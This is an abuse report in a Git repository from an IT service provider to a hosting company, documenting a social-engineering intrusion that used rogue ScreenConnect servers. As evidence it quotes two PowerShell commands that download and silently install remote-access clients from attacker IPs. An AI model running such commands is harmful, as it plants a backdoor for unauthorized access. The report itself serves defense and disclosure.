azcomputerguru/claudetools
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
71ada136a8bddebb84bcf8fe8bf62ca5ddb2d2dc
claudetools/clients/dataforth/docs/incident-2026-03-27-abuse-report-virtuo.md
OC-5070 d7d9f72fc6 Session log: Dataforth security incident, MFA rollout, test datasheet investigation 
- DF-JOEL2 compromised via ScreenConnect social engineering (Angel Raya)
- C2 IPs blocked, rogue clients removed, M365 sessions revoked, password reset
- IC3 complaint filed, abuse reports sent to Virtuo and ConnectWise
- Conditional Access policies deployed (MFA, block foreign, block legacy auth)
- 38 stale test station accounts deleted from Entra
- Test datasheet pipeline investigated - data exists in DB, export step broken
- TestDataSheetUploader source code extracted for analysis

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-03-27 20:07:19 -07:00

75 lines
3.5 KiB
Markdown
Raw Blame History

Subject: Abuse Report - Unauthorized Remote Access C2 Servers on 80.76.49.18 and 45.88.91.99
To: abuses@virtuo.host
CC: noc@virtuo.host
Dear Virtuo Abuse Department,
We are reporting two IP addresses on your network that are being used as command-and-control servers for unauthorized remote access attacks against our client's infrastructure.
## Offending IPs
- **80.76.49.18** (port 8041)
- **45.88.91.99** (port 8041)
Both IPs are on AS399486 (12651980 CANADA INC. / Virtuo).
## Nature of Abuse
These servers are hosting self-hosted ConnectWise ScreenConnect (remote access) instances on port 8040/8041, used to maintain persistent unauthorized access to victim machines. This is not a legitimate use of remote support software -- the clients are deployed silently via PowerShell commands executed during an active social engineering attack, then hidden from the Windows uninstall list using third-party tools.
## Evidence
### Attack Timeline (March 27, 2026 - UTC-7)
1. At approximately 08:28, an attacker using the alias "Angel Raya" connected to the victim machine via a ScreenConnect cloud relay (instance-wlb9ga-relay.screenconnect.com).
2. At 08:29, the following commands were executed in a PowerShell session on the victim machine to download and silently install ScreenConnect clients from your infrastructure:
```
powershell -Command "Invoke-WebRequest -Uri 'http://80.76.49.18:8040/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'ScreenConnect.ClientSetup.msi'; Start-Process msiexec -ArgumentList '/i', 'ScreenConnect.ClientSetup.msi', '/qn', '/norestart' -Wait"
powershell -Command "Invoke-WebRequest -Uri 'http://45.88.91.99:8040/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'ScreenConnect.ClientSetup.msi'; Start-Process msiexec -ArgumentList '/i', 'ScreenConnect.ClientSetup.msi', '/qn', '/norestart' -Wait"
```
3. The attacker then downloaded a tool from sordum.org ("Hide From Uninstall List") to conceal the rogue ScreenConnect installations from Windows Add/Remove Programs.
4. At 11:55, a session identified as "Administrator" connected back through the 80.76.49.18 C2 server, confirming the backdoor was actively used for return access.
### ScreenConnect Service Details
**Client connecting to 80.76.49.18:**
- Service Name: ScreenConnect Client (0dfe1abae029411c)
- Session GUID: eec1c861-ec30-4c7a-a8e7-cc8a1dbd5a56
- Relay: 80.76.49.18:8041
- Version: 25.2.4.9229
**Client connecting to 45.88.91.99:**
- Service Name: ScreenConnect Client (a897d9a21259d116)
- Session GUID: 406bd356-cde4-4738-a22f-f776c8097686
- Relay: 45.88.91.99:8041
- Version: 25.2.4.9229
### Additional Context
- The ScreenConnect MSI packages have file timestamps from April 8, 2025, indicating this infrastructure has been used for attacks for approximately one year.
- The victim's Microsoft 365 account was also subject to brute-force login attempts from IPs in Germany (45.86.202.x), Luxembourg, and Turkey during the same period, with a successful unauthorized sign-in from Istanbul, Turkey (91.93.232.236) on the same day.
## Requested Action
We request that you:
1. Immediately suspend the servers at 80.76.49.18 and 45.88.91.99
2. Preserve all logs related to these IPs for law enforcement
3. Provide any subscriber/billing information to law enforcement upon request
This incident is being reported to the FBI Internet Crime Complaint Center (IC3) and ConnectWise.
## Reporting Organization
Arizona Computer Guru, LLC
Managed Service Provider
Phone: 520-304-8300
Email: support@azcomputerguru.com
Thank you for your prompt attention to this matter.
Reference in New Issue View Git Blame Copy Permalink